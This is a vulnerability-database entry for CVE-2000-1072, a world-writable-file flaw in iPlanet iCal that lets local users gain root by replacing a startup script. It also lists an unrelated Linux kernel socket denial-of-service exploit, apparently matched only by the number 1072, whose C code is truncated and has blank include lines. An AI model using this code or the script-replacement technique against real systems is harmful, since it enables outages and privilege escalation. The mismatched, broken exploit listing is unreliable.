CVE-2000-1072
Published 2000-12-11
Priority: P422 | high 7.2 (CVSS 2.0)
AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.08% (61.0th percentile)
iCal 2.1 Patch 2 installs many files with world-writeable permissions, which allows local users to modify the iCal configuration and execute arbitrary commands by replacing the iplncal.sh program with a Trojan horse.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netscape | iplanet_ical | — | — |
No detection rules found.
Exploit-DB
Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions
exploitdb·2000-10-10
---
source: https://www.securityfocus.com/bid/1768/info
Netscape's iPlanet iCal application is a network-based calendar service built for deployment in organizations that require a centralized calendar system. Certain versions of iCal ship with a vulnerability, introduced in the installation process, that allows malicious local users to gain root on the system.
During the installation process a large number of files are left world-readable and world-writable. One such file, /opt/SUNWicsrv/cal/bin/iplncal.sh, is designed to be run at startup as root and is world-writable by default. This allows users to modify the contents of this startup script and have it executed at boot time or whenever the machine is re-initialized.
Exploit-DB
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service
exploitdb·2000-03-23
---
```c
/*
source: https://www.securityfocus.com/bid/1072/info
A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
*/
#include
#include
#include
char buf[128 * 1024];
int main ( int argc, char **argv )
{
    struct sockaddr SyslogAddr;
    int LogFile;
    int bufsize = sizeof(buf)-5;
    int i;
    for ( i = 0; i < bufsize; i++ )
        buf[i] = ' '+(i%95);
    buf[i] = '\0';
    SyslogAddr.sa_family = AF
```
No writeups or analysis indexed.
http://www.atstake.com/research/advisories/2000/a100900-1.txt
http://www.osvdb.org/7212
http://www.securityfocus.com/bid/1768
https://exchange.xforce.ibmcloud.com/vulnerabilities/5756